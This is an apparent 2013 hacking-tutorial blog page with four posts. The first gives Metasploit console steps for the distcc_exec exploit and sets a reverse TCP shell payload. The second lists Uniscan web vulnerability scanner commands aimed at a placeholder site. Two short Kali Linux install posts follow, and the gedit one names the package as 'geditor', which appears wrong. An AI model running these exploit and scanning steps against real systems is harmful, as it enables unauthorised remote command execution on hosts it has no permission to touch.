Wednesday, 20 March 2013

DistCC Daemon Command Execution

msf

This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Exploit RanK - Excellent
Cvss Score - 9.3

Commands :


msfconsole

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
msf exploit(distcc_exec) > set RHOST [TARGET IP]
msf exploit(distcc_exec) > exploit

VIDEO


Posted by at No comments:
Labels: , , , , , ,

Vulnerability Scanner uniscan.pl in Backtrack 5 R3

uniscan

The Uniscan is a vulnerability scanner for Web applications, written in perl for Linux environment. It was developed as conclusion work of the computer science course of Federal University of Pampa and is licensed under the GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).

Features Of Uniscan:



  • Identification of system pages through a Web Crawler.

  • Use of threads in the crawler.

  • Control the maximum number of requests the crawler.

  • Control of variation of system pages identified by Web Crawler.

  • Control of file extensions that are ignored.

  • Test of pages found via the GET method.

  • Test the forms found via the POST method.

  • Support for SSL requests (HTTPS).

  • Proxy support.

  • Generate site list using Google.

  • Generate site list using Bing.

  • Plug-in support for Crawler.

  • Plug-in support for dynamic tests.

  • Plug-in support for static tests.

  • Plug-in support for stress tests.

  • Multi-language support.

  • Web client.

  • GUI client written in perl using tk.


For Use :

perl ./uniscan.pl -u http://www.targetsite.com/ -qweds

perl ./uniscan.pl -f sites.txt -bqweds

perl ./uniscan.pl -i uniscan

perl ./uniscan.pl -i xxx.xxx.xxx.xxx

perl ./uniscan.pl -u https://www.targetsite.com/ -r

VIDEO


Posted by at No comments:
Labels: , , , ,

Tuesday, 19 March 2013

How to install ubuntu software center in Kali Linux

Kali Linux

By default ,ubuntu software center is not install in Kali Linux. If u want to install ubuntu software center in Kali Linux , use this apt-get command.

apt-get install software-center


VIDEO


Posted by at No comments:
Labels: ,

How to install gedit text editer in Kali Linux

install gedit text editer in Kali Linux

By default , gedit is not install in Kali Linux. If u want to install gedit text editer in Kali Linux , use this apt-get command.

apt-get install geditor


VIDEO




Posted by at 5 comments:
Labels: , ,
Subscribe to: Comments (Atom)